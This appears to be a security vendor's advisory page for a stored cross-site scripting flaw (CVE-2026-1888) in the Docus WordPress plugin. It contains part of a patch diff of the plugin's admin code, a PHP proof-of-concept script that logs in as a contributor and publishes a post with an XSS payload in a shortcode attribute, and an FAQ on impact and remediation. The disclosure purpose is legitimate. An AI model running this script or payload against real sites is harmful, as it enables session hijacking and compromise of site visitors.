+        }else{
+            $plugin_icon_url = $this->assets_url .'/images/extensions/'.$icon.'.png';
+        }
+
+        return $plugin_icon_url;
+
+    }
+
+    /**
+     * [active_install_count] Manage Active install count
+     * @param  [int] $active_installs
+     * @return [string]
+     */
+    public function active_install_count( $active_installs ){
+
+        if ( $active_installs >= 1000000 ) {
+            $active_installs_millions = floor( $active_installs / 1000000 );
+            $active_installs_text     = sprintf(
+                /* translators: %s: Number of millions. */
+                _nx( '%s+ Million', '%s+ Million', $active_installs_millions, 'Active plugin installations' ),
+                number_format_i18n( $active_installs_millions )
+            );
+        } elseif ( 0 === $active_installs ) {
+            $active_installs_text = _x( 'Less Than 10', 'Active plugin installations' );
+        } else {
+            $active_installs_text = number_format_i18n( $active_installs ) . '+';
+        }
+        return $active_installs_text;
+
+    }
+
+    /**
+     * [plugin_activation] Plugin activation ajax callable function
+     * @return [JSON]
+     */
+    public function plugin_activation() {
+
+        check_ajax_referer('docus_rp_nonce', 'nonce');
+
+        if ( ! current_user_can( 'install_plugins' ) || ! isset( $_POST['location'] ) || ! $_POST['location'] ) {
+            wp_send_json_error(
+                array(
+                    'success' => false,
+                    'message' => esc_html__( 'Plugin Not Found', $this->text_domain ),
+                )
+            );
+        }
+
+        $plugin_location = ( isset( $_POST['location'] ) ) ? esc_attr( $_POST['location'] ) : '';
+        $activate    = activate_plugin( $plugin_location, '', false, true );
+
+        if ( is_wp_error( $activate ) ) {
+            wp_send_json_error(
+                array(
+                    'success' => false,
+                    'message' => $activate->get_error_message(),
+                )
+            );
+        }
+
+        wp_send_json_success(
+            array(
+                'success' => true,
+                'message' => esc_html__( 'Plugin Successfully Activated', $this->text_domain ),
+            )
+        );
+
+    }
+
+
 }
 No newline at end of file
--- a/docus/admin/admin-init.php
+++ b/docus/admin/admin-init.php
@@ -1,446 +1,446 @@
-<?php
-
-namespace DocusAdmin;
-
-if( ! defined( 'ABSPATH' ) ) exit(); // Exit if accessed directly
-
-/**
- * Docus Dashboard Options
- */
-class Docus_Admin_Setting
-{
-
-	/**
-     * [$_instance]
-     * @var null
-    */
-    private static $_instance = null;
-
-    /**
-     * [instance] Initializes a singleton instance
-     * @return [Docus_Admin_Setting]
-    */
-    public static function instance() {
-        if ( is_null( self::$_instance ) ) {
-            self::$_instance = new self();
-        }
-        return self::$_instance;
-    }
-
-	function __construct()
-	{
-    	add_action( 'admin_init', array( $this, 'admin_init' ) );
-        add_action( 'admin_menu', array( $this, 'admin_menu' ) );
-    	add_action( 'admin_enqueue_scripts', array( $this, 'docus_admin_assets' ) );
-        $this->plugin_recommendations();
-	}
-
-	// Plugins menu Register
-    function admin_menu() {
-
-        add_menu_page(
-			__('Docus','docus'),
-			__('Docus','docus'),
-			'manage_options',
-			'docus-setting-page',
-			array($this,'plugin_page'),
-			DOCUS_PL_URL.'admin/assets/images/playlist-3.png',
-			65
-		);
-
-    }
-
-	function admin_init() {
-		$docus_options=array(
-            'apikey',
-            'play_list_id',
-            'page_layout_style',
-            'video_limit',
-    	);
-
-    	foreach ( $docus_options as $field ) {
-			register_setting( 'docus-settings-group', $field );
-		}
-	}
-
-    /**
-     * [plugin_recommendations]
-     * @return [void]
-     */
-    public function plugin_recommendations(){
-
-        $get_instance = Recommended_Plugins::instance(
-            array(
-                'text_domain'       => 'docus',
-                'parent_menu_slug'  => 'docus-setting-page',
-                'menu_capability'   => 'manage_options',
-                'menu_page_slug'    => 'docus-recommendations',
-                'priority'          => 24,
-                'assets_url'        => DOCUS_PL_URL.'admin/assets',
-                'hook_suffix'       => 'docus_page_docus-recommendations'
-            )
-        );
-
-        $get_instance->add_new_tab( array(
-
-            'title' => esc_html__( 'Recommended', 'docus' ),
-            'active' => true,
-            'plugins' => array(
-
-                array(
-                    'slug'      => 'woolentor-addons',
-                    'location'  => 'woolentor_addons_elementor.php',
-                    'name'      => esc_html__( 'WooLentor', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-mega-for-elementor',
-                    'location'  => 'htmega_addons_elementor.php',
-                    'name'      => esc_html__( 'HT Mega', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'hashbar-wp-notification-bar',
-                    'location'  => 'init.php',
-                    'name'      => esc_html__( 'HashBar', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-slider-for-elementor',
-                    'location'  => 'ht-slider-for-elementor.php',
-                    'name'      => esc_html__( 'HT Slider For Elementor', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-contactform',
-                    'location'  => 'contact-form-widget-elementor.php',
-                    'name'      => esc_html__( 'HT Contact Form 7', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'extensions-for-cf7',
-                    'location'  => 'extensions-for-cf7.php',
-                    'name'      => esc_html__( 'Extensions For CF7', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-wpform',
-                    'location'  => 'wpform-widget-elementor.php',
-                    'name'      => esc_html__( 'HT WPForms', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-menu-lite',
-                    'location'  => 'ht-mega-menu.php',
-                    'name'      => esc_html__( 'HT Menu', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'insert-headers-and-footers-script',
-                    'location'  => 'init.php',
-                    'name'      => esc_html__( 'HT Script', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'wp-plugin-manager',
-                    'location'  => 'plugin-main.php',
-                    'name'      => esc_html__( 'WP Plugin Manager', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'wc-builder',
-                    'location'  => 'wc-builder.php',
-                    'name'      => esc_html__( 'WC Builder', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'whols',
-                    'location'  => 'whols.php',
-                    'name'      => esc_html__( 'Whols', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'just-tables',
-                    'location'  => 'just-tables.php',
-                    'name'      => esc_html__( 'JustTables', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'wc-multi-currency',
-                    'location'  => 'wcmilticurrency.php',
-                    'name'      => esc_html__( 'Multi Currency', 'docus' )
-                )
-            )
-
-        ) );
-
-        $get_instance->add_new_tab(array(
-            'title' => esc_html__( 'You May Also Like', 'docus' ),
-            'plugins' => array(
-
-                array(
-                    'slug'      => 'woolentor-addons-pro',
-                    'location'  => 'woolentor_addons_pro.php',
-                    'name'      => esc_html__( 'WooLentor Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/woolentor-pro-woocommerce-page-builder/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'WooLentor is one of the most popular WooCommerce Elementor Addons on WordPress.org. It has been downloaded more than 672,148 times and 60,000 stores are using WooLentor plugin. Why not you?', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'htmega-pro',
-                    'location'  => 'htmega_pro.php',
-                    'name'      => esc_html__( 'HT Mega Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/ht-mega-pro/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'HTMega is an absolute addon for elementor that includes 80+ elements & 360 Blocks with unlimited variations. HT Mega brings limitless possibilities. Embellish your site with the elements of HT Mega.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'swatchly-pro',
-                    'location'  => 'swatchly-pro.php',
-                    'name'      => esc_html__( 'Product Variation Swatches', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/swatchly-product-variation-swatches-for-woocommerce-products/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Are you getting frustrated with WooCommerce’s current way of presenting the variants for your products? Well, say goodbye to dropdowns and start showing the product variations in a whole new light with Swatchly.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'whols-pro',
-                    'location'  => 'whols-pro.php',
-                    'name'      => esc_html__( 'Whols Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/whols-woocommerce-wholesale-prices/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Whols is an outstanding WordPress plugin for WooCommerce that allows store owners to set wholesale prices for the products of their online stores. This plugin enables you to show special wholesale prices to the wholesaler. Users can easily request to become a wholesale customer by filling out a simple online registration form. Once the registration is complete, the owner of the store will be able to review the request and approve the request either manually or automatically.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'just-tables-pro',
-                    'location'  => 'just-tables-pro.php',
-                    'name'      => esc_html__( 'JustTables Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/wp/justtables/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'JustTables is an incredible WordPress plugin that lets you showcase all your WooCommerce products in a sortable and filterable table view. It allows your customers to easily navigate through different attributes of the products and compare them on a single page. This plugin will be of great help if you are looking for an easy solution that increases the chances of landing a sale on your online store.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'multicurrencypro',
-                    'location'  => 'multicurrencypro.php',
-                    'name'      => esc_html__( 'Multi Currency Pro for WooCommerce', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/multi-currency-pro-for-woocommerce/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Multi-Currency Pro for WooCommerce is a prominent currency switcher plugin for WooCommerce. This plugin allows your website or online store visitors to switch to their preferred currency or their country’s currency.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'cf7-extensions-pro',
-                    'location'  => 'cf7-extensions-pro.php',
-                    'name'      => esc_html__( 'Extensions For CF7 Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/cf7-extensions/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Contact Form7 Extensions plugin is a fantastic WordPress plugin that enriches the functionalities of Contact Form 7.This all-in-one WordPress plugin will help you turn any contact page into a well-organized, engaging tool for communicating with your website visitors by providing tons of advanced features like drag and drop file upload, repeater field, trigger error for already submitted forms, popup form response, country flags and dial codes with a telephone input field and acceptance field, etc. in addition to its basic features.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'hashbar-pro',
-                    'location'  => 'init.php',
-                    'name'      => esc_html__( 'HashBar Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/wordpress-notification-bar-plugin/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'HashBar is a WordPress Notification / Alert / Offer Bar plugin which allows you to create unlimited notification bars to notify your customers. This plugin has option to show email subscription form (sometimes it increases up to 500% email subscriber), Offer text and buttons about your promotions. This plugin has the options to add unlimited background colors and images to make your notification bar more professional.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'wp-plugin-manager-pro',
-                    'location'  => 'plugin-main.php',
-                    'name'      => esc_html__( 'WP Plugin Manager Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/wp-plugin-manager-pro/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'WP Plugin Manager Pro is a specialized WordPress Plugin that helps you to deactivate unnecessary WordPress Plugins page wise and boosts the speed of your WordPress site to improve the overall site performance.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-script-pro',
-                    'location'  => 'plugin-main.php',
-                    'name'      => esc_html__( 'HT Script Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/insert-headers-and-footers-code-ht-script/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Insert Headers and Footers Code allows you to insert Google Analytics, Facebook Pixel, custom CSS, custom HTML, JavaScript code to your website header and footer without modifying your theme code.This plugin has the option to add any custom code to your theme in one place, no need to edit the theme code. It will save your time and remove the hassle for the theme update.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-menu',
-                    'location'  => 'ht-mega-menu.php',
-                    'name'      => esc_html__( 'HT Menu Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/ht-menu-pro/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'WordPress Mega Menu Builder for Elementor', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-slider-addons-pro',
-                    'location'  => 'ht-slider-addons-pro.php',
-                    'name'      => esc_html__( 'HT Slider Pro For Elementor', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/ht-slider-pro-for-elementor/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'HT Slider Pro is a plugin to create a slider for WordPress websites easily using the Elementor page builder. 80+ prebuild slides/templates are included in this plugin. There is the option to create a post slider, WooCommerce product slider, Video slider, image slider, etc. Fullscreen, full width and box layout option are included.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-google-place-review',
-                    'location'  => 'ht-google-place-review.php',
-                    'name'      => esc_html__( 'Google Place Review', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/google-place-review-plugin-for-wordpress/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'If you are searching for a modern and excellent google places review WordPress plugin to showcase reviews from Google Maps and strengthen trust between you and your site visitors, look no further than HT Google Place Review', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'was-this-helpful',
-                    'location'  => 'was-this-helpful.php',
-                    'name'      => esc_html__( 'Was This Helpful?', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/was-this-helpful/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( "Was this helpful? is a WordPress plugin that allows you to take visitors' feedback on your post/pages or any article. A visitor can share his feedback by like/dislike/yes/no", 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-click-to-call',
-                    'location'  => 'ht-click-to-call.php',
-                    'name'      => esc_html__( 'HT Click To Call', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/ht-click-to-call/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( "HT – Click to Call is a lightweight WordPress plugin that allows you to add a floating click to call button on your website. It will offer your website visitors an opportunity to call your business immediately at the right moment, especially when they are interested in your products or services and seeking more information.", 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'docus-pro',
-                    'location'  => 'docus-pro.php',
-                    'name'      => esc_html__( 'Docus Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/docus-pro-youtube-video-playlist/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( "Embedding a YouTube playlist into your website plays a vital role to curate your content into several categories and make your web content more engaging and popular by keeping the visitors on your website for a longer period.", 'docus' ),
-                ),
-
-            )
-        ));
-
-        $get_instance->add_new_tab(array(
-            'title' => esc_html__( 'Others', 'docus' ),
-            'plugins' => array(
-
-                array(
-                    'slug'      => 'really-simple-google-tag-manager',
-                    'location'  => 'really-simple-google-tag-manager.php',
-                    'name'      => esc_html__( 'Really Simple Google Tag Manager', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-instagram',
-                    'location'  => 'ht-instagram.php',
-                    'name'      => esc_html__( 'HT Feed', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'faster-youtube-embed',
-                    'location'  => 'faster-youtube-embed.php',
-                    'name'      => esc_html__( 'Faster YouTube Embed', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'wc-sales-notification',
-                    'location'  => 'wc-sales-notification.php',
-                    'name'      => esc_html__( 'WC Sales Notification', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'preview-link-generator',
-                    'location'  => 'preview-link-generator.php',
-                    'name'      => esc_html__( 'Preview Link Generator', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'quickswish',
-                    'location'  => 'quickswish.php',
-                    'name'      => esc_html__( 'QuickSwish', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'data-captia',
-                    'location'  => 'data-captia.php',
-                    'name'      => esc_html__( 'DataCaptia', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'coupon-zen',
-                    'location'  => 'coupon-zen.php',
-                    'name'      => esc_html__( 'Coupon Zen', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'sirve',
-                    'location'  => 'sirve.php',
-                    'name'      => esc_html__( 'Sirve – Simple Directory Listing', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-social-share',
-                    'location'  => 'ht-social-share.php',
-                    'name'      => esc_html__( 'HT Social Share', 'docus' )
-                ),
-
-            )
-        ));
-
-    }
-
-	function docus_admin_assets($hook){
-		if($hook === 'toplevel_page_docus-setting-page'){
-			//enque stype
-			wp_enqueue_style( 'docus-admin-style', DOCUS_PL_URL.'admin/assets/css/admin-style.css');
-            wp_enqueue_script( 'docus-admin', DOCUS_PL_URL.'admin/assets/js/admin.js', array('jquery'),'1.0.0', true);
-		}
-	}
-
-	function plugin_page() {
-
-        ?>
-            <h2 class="nav-tab-wrapper">
-                <a href="#docus-tab-1" id="htg-general-tab" class="htg-nav nav-tab"><?php esc_html_e('General', 'docus')?></a>
-                <a href="#docus-tab-2" id="htg-style-tab" class="htg-nav nav-tab"><?php esc_html_e('Shortcode', 'docus')?></a>
-            </h2>
-        <?php
-        echo '<div id="docus-tab-1" class="docus-tab-group">';
-

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1888 - Docus <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

<?php
/**
 * Proof of Concept for CVE-2026-1888
 * Requires Contributor-level WordPress credentials
 * Demonstrates stored XSS via docusplaylist shortcode attributes
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to inject - basic alert demonstrating XSS
$xss_payload = '" onmouseover="alert(document.domain)"';

// Initialize cURL session
$ch = curl_init();

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$post_fields = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);

// Step 2: Create new post with malicious shortcode
$new_post_url = $target_url . '/wp-admin/post-new.php';

// Extract nonce from post creation page
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Parse nonce from response (simplified - real implementation would use DOM parsing)
// In practice, you would extract the _wpnonce from the form
$nonce = 'extracted_nonce_here'; // Placeholder for actual nonce extraction

// Step 3: Submit post with XSS payload
$submit_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    'post_title' => 'Test Post with XSS',
    'content' => '[docusplaylist id="' . $xss_payload . '"]',
    'publish' => 'Publish',
    'post_type' => 'post',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $new_post_url
);

curl_setopt($ch, CURLOPT_URL, $submit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));

$response = curl_exec($ch);

// Check for success
if (strpos($response, 'Post published') !== false) {
    echo "Exploit successful! XSS payload injected.";
    echo "Visit the published post to trigger the payload.";
} else {
    echo "Exploit failed. Check credentials and permissions.";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1888?
Overview of the vulnerability
CVE-2026-1888 is a stored cross-site scripting (XSS) vulnerability found in the Docus plugin for WordPress, affecting versions up to 1.0.6. It allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into posts using the ‘docusplaylist’ shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the shortcode handler. Attackers can craft malicious attributes for the shortcode, which are then stored in the database and executed in the context of any user viewing the affected post.
Who is affected by this vulnerability?
User roles and access levels
Any WordPress site using the Docus plugin version 1.0.6 or earlier is at risk. Specifically, users with Contributor-level access or higher can exploit this vulnerability to inject scripts.
How can I check if my site is vulnerable?
Identifying affected versions
To determine if your site is vulnerable, check the version of the Docus plugin installed. If it is version 1.0.6 or earlier, your site is susceptible to this vulnerability.
How can I fix CVE-2026-1888?
Updating the plugin
The vulnerability is patched in version 1.0.7 of the Docus plugin. Update the plugin to the latest version to mitigate the risk associated with this vulnerability.
What is the CVSS score of this vulnerability?
Understanding the severity rating
CVE-2026-1888 has a CVSS score of 6.4, indicating a medium severity level. This score reflects the potential impact of the vulnerability, particularly in terms of session hijacking and unauthorized actions.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to arbitrary JavaScript execution, allowing attackers to hijack sessions, perform unauthorized actions, deface content, or exfiltrate sensitive data. The attack persists across sessions due to the stored nature of the payload.
What steps can I take to mitigate risks if I cannot update immediately?
Temporary measures
If updating the plugin is not immediately possible, consider disabling the Docus plugin until a patch can be applied. Additionally, review user roles and limit access to Contributor-level users to minimize potential exploitation.
How does the proof of concept demonstrate the vulnerability?
Exploit demonstration
The proof of concept provided illustrates how an authenticated user can log in and submit a post with a malicious payload in the shortcode attributes. It shows the execution of JavaScript when the post is viewed, confirming the vulnerability’s impact.
What are shortcode attributes and why are they significant in this context?
Understanding shortcode functionality
Shortcode attributes are parameters that can be passed to WordPress shortcodes to modify their behavior. In this case, the lack of proper sanitization on these attributes allows attackers to inject scripts, making them a critical vector for the vulnerability.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored XSS is a type of security vulnerability where an attacker injects malicious scripts into content that is stored on a server. When other users access the affected content, the scripts execute in their browsers, potentially compromising their security.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect that your site has been compromised due to this vulnerability, immediately update the Docus plugin to the patched version. Additionally, review logs for unauthorized changes, reset user passwords, and perform a security audit to assess any damage.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations